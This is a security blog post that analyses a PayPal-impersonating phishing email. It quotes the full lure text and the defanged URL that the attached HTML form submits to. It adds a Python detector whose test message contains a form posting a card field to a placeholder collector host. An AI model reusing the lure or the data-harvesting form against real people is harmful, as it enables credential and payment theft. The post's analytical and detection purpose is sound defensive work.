Spam impersonating PayPal using attached form

A classic phishing email… Nothing special (same bad English, as always).

Dear Valued Customer,

Unauthorized access has been detected in your account.

Unfortunately, due to this event, our security system has limited the access to your account.
Account Limitations prevent you from completing certain actions with your account, such as withdrawing, sending, or receiving money.
These limitations are implemented when we see unusual or suspicious activity to help protect both PayPal buyers and sellers.

Please verify your account by completing the form which is attached in this email. By doing this, restrictions in your account will be lifted.

We apologize for any inconvenience.

Thank you,
PayPal Security Team

[Screenshot: the phishing email]

What is interesting is the use of a technique which I haven’t seen used for a couple of years: they attached an HTML document containing the form below.

The document is called “form.html” and it contains just a single JavaScript function, used to validate the input.

It is a simple HTML form which submits to hxxp://www.secured-line.su/x01.php using a hidden ID.

Are they counting which form performs better? Hmm…

 

[Screenshot: the attached PayPal form]

 

Fortunately, Google detects these emails as spam/phishing and blocks them.
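As an added example (not code from the original post), here is one way a mail filter could flag the pattern described above: an HTML attachment whose form submits to a remote host, reported together with the hidden fields it carries. The sample message, sender, host name and ID value are constructed placeholders.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    # Records each <form>'s action URL and the hidden inputs nested in it.
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "hidden": {}})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "hidden":
            self.forms[-1]["hidden"][a.get("name") or ""] = a.get("value") or ""


def audit_message(raw_bytes):
    """Return one finding per form in an HTML attachment that submits to a remote host."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        parser = FormAudit()
        parser.feed(part.get_content())
        for form in parser.forms:
            url = urlparse(form["action"])
            if url.scheme in ("http", "https") and url.hostname:
                findings.append({"file": part.get_filename(), "host": url.hostname,
                                 "hidden": form["hidden"]})
    return findings


# Constructed sample with the shape described above; host, sender and ID are placeholders.
SAMPLE = (
    b'From: security@paypal.example\r\nSubject: Account limited\r\nMIME-Version: 1.0\r\n'
    b'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
    b'--b1\r\nContent-Type: text/plain\r\n\r\nPlease complete the attached form.\r\n'
    b'--b1\r\nContent-Type: text/html\r\nContent-Disposition: attachment; filename="form.html"\r\n\r\n'
    b'<form method="post" action="http://collector.example/x01.php">'
    b'<input type="hidden" name="id" value="7"><input name="card"></form>\r\n'
    b'--b1--\r\n'
)

if __name__ == "__main__":
    print(audit_message(SAMPLE))
```

A legitimate sender has little reason to mail a standalone HTML form that posts to a third-party host, so a finding here is a strong signal for quarantine or manual review.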

For additional tips on how to improve your security, check my eBook here: http://www.improve-your-security.org

 


© Copyright 2015 Sorin Mustaca, All rights Reserved. Written For: Sorin Mustaca on Cybersecurity

